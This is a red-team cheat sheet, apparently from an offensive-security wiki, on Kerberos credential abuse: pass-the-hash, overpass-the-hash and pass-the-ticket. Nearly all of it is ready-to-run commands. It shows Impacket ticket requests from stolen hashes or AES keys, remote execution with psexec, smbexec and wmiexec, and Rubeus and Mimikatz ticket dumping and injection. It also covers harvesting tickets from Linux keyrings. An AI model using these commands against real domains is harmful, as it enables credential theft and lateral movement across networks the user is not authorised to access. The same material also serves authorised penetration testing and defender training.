Use Alternate Authentication Material

Application Access Token

Pass the Hash

Overpass The Hash/Pass The Key (PTK)

Impacket

Request the TGT with hash

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)

python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>

Request the TGT with password

python getTGT.py <domain_name>/<user_name>:[password]

Set the TGT for impacket use

export KRB5CCNAME=<TGT_ccache_file>

Execute remote commands with any of the following by using the TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Rubeus and PsExec

Ask and inject the ticket

.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

Execute a cmd in the remote machine

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Pass the Ticket

Pass The Ticket (PTT)

Harvest tickets from Linux

  • Check type and location of tickets:

    grep default_ccache_name /etc/krb5.conf

  • If none return, default is FILE:/tmp/krb5cc_%{uid}.

  • In case of file tickets, you can copy-paste (if you have permissions) for use them.

  • In case of being *KEYRING* tickets, you can use tickey to get them:

cp tickey /tmp/tickey
/tmp/tickey -i

Harvest tickets from Windows

With Mimikatz:

mimikatz # sekurlsa::tickets /export

With Rubeus in Powershell:

.\Rubeus dump

After dump with Rubeus tickets in base64, to write the in a file

To convert tickets between Linux/Windows format with ticket_converter.py:

python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi

Using ticket in Linux:

Set the ticket for impacket use

export KRB5CCNAME=<TGT_ccache_file_path>

Execute remote commands with any of the following by using the TGT

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Using ticket in Windows

Inject ticket with Mimikatz:

mimikatz # kerberos::ptt <ticket_kirbi_file>

Inject ticket with Rubeus:

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

Execute a cmd in the remote machine with PsExec:

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Web Session Cookie

PreviousTaint Shared ContentNextCollection

Last updated